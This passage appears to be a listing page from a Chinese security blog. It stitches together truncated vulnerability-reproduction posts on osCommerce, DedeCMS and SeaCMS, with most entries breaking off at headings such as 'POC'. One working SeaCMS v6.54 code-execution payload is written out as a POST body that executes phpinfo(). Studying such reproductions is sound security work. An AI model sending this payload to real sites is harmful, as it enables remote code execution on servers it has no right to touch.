0x01 前言

好几天没有写了,前两天又去Boom了,差点没缓过来。今天在exploit-db逛看到一个洞,也是install的地方,想去利用上次那个远程数据库技巧来尝试下,发现这个洞根本用不到,不过新手可以学习下哈,也可以收藏下,因为有时候在ctf线下赛的时候官方会拿一些国外的程序给你玩,最近也在写python的漏洞利用工具,欢迎关注我的github。

0x02 环境

程序源码下载:https://www.exploit-db.com/apps/ce2796b352d6e0fb4e9f03866ae98541-oscommerce-2.3.4.zip
Web环境:Windows 10+Apache2+PHP5.6+MySQL

0x03 漏洞利用过程

1.我们先正常安装这个程序

2.执行我们的payload

php DedeCMS getshell

前言

今天就审计一个洞,时间不够用了。明天或者周末看看有空有拿一些难的漏洞来审计复现一下。

环境

Web: Apache+PHP+MySql
System: Ubuntu
Browser: Firefox Quantum

漏洞详情

任意文件删除

文件位置:/user/licence_save.php

前言

前几天在先知看到的漏洞,就很想写个分析过程了的,因为比赛培训和在审计一个CMS拖到了今天。

环境

Web: phpstudy
System: Windows 7 X64
Browser: Firefox Quantum
Python version : 2.7
Tools: PhpStorm 2017.3.3、Seay源代码审计系统

任意文件删除漏洞

复现

POC

前提:需要由对应的删除权限
flienamecsv代表要删除的文件

前言

这几天感冒很难受,再加上比赛的培训,估计后面会两天一篇。
这个小型CMS前段时间我也挖到了很多洞,这次就找seebug发的一篇来做审计。

环境

Web: phpstudy
System: Windows 10 X64
Browser: Firefox Quantum
Python version : 2.7

漏洞详情

前言

这两个版本修复上次的v6.45版本中的order传值后执行的漏洞,但是在新的版本里面利用parseIf函数的功能还可以继续利用。
因为上一篇也已经过了一遍search.php的执行过程,这篇就不再重复讲解了。
链接:http://getpass.cn/2018/03/02/SeaCMS%20v6.45%E5%89%8D%E5%8F%B0Getshell%20%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E(%E6%AF%8F%E6%97%A5%E4%B8%80%E6%B4%9E)/

环境

Web: phpstudy
System: Windows 10 X64
Browser: Firefox Quantum
Python version : 2.7

v6.54漏洞详情

漏洞代码执行

Payload

get:http://seacms.test/search.php
POST: searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[9]))&9[]=ph&9[]=pinfo();

执行结果


1 / 2